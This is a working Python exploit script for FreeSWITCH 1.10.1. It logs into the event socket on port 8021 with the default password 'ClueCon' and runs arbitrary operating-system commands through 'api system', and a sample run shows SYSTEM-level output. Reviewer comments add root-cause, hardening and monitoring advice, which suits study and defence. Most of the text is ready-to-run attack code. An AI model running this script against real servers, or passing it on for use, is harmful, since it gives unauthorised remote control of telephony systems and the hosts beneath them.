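#!/usr/bin/python3
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
# -- Reviewer notes --
# Root cause: this is a configuration weakness, not a memory-safety bug. The
# event socket accepts the shipped default password ('ClueCon'), and an
# authenticated client may call `api system`, which runs its argument as an OS
# command with the privileges of the FreeSWITCH process (SYSTEM in the example
# above).
#
# Hardening (mod_event_socket, normally event_socket.conf.xml):
#   * replace the default `password` value with a long random secret;
#   * keep `listen-ip` on loopback unless remote control is really required;
#   * if it is required, restrict clients with `apply-inbound-acl` and a
#     host/network firewall rule on TCP 8021;
#   * run the FreeSWITCH service under a dedicated low-privilege account so an
#     authenticated `system` call does not yield SYSTEM/root.
#
# Monitoring: connections to TCP 8021 from non-loopback sources and unexpected
# child processes of the FreeSWITCH service are both worth alerting on.

import socket
import sys

# Exactly two positional arguments are expected: the host running the event
# socket and the command string passed to `api system`.
if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <address> <command>')
    sys.exit(1)

ADDRESS = sys.argv[1]
CMD = sys.argv[2]
PASSWORD = 'ClueCon'  # default password for FreeSWITCH

# The context manager closes the socket on every exit path, including the
# sys.exit() calls below (SystemExit propagates through the `with` block).
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((ADDRESS, 8021))

    # The server is expected to open the session with an auth/request frame.
    response = s.recv(1024)
    if b'auth/request' not in response:
        print('Not prompted for authentication, likely not vulnerable')
        sys.exit(1)

    # Frames are terminated by a blank line, hence the trailing "\n\n".
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))

    response = s.recv(1024)
    if b'+OK accepted' not in response:
        # The default credential was rejected, i.e. the password was changed.
        print('Authentication failed')
        sys.exit(1)

    print('Authenticated')
    s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
    response = s.recv(8096).decode()
    print(response)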